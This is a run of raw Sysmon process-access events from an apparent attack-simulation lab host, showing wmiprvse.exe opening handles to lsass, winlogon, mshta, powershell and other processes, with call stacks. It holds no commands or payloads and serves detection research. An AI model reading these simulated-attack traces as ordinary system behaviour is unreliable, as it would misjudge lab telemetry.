15:59:44.975{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1700-00000000A301}1656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027691Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.975{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1600-00000000A301}1536C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027690Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.975{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027689Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.975{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1400-00000000A301}1280C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027688Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.975{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1300-00000000A301}1264C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027687Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.975{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1200-00000000A301}1176C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027686Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.975{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1100-00000000A301}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027685Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.975{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1000-00000000A301}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027684Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.975{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0F00-00000000A301}1112C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027683Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.975{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027682Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.975{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0D00-00000000A301}996C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027681Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.975{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4986-6008-0C00-00000000A301}608C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027680Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.975{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027679Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.975{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4984-6008-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027678Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.928{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-536F-6008-7906-00000000A301}2864C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027677Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.928{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-536F-6008-7806-00000000A301}5840C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027676Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.928{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-536F-6008-7706-00000000A301}5156C:\Windows\System32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027675Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.928{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5359-6008-4306-00000000A301}4856C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027674Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.928{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5357-6008-3E06-00000000A301}6760C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027673Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.928{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5356-6008-3906-00000000A301}4832C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027672Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 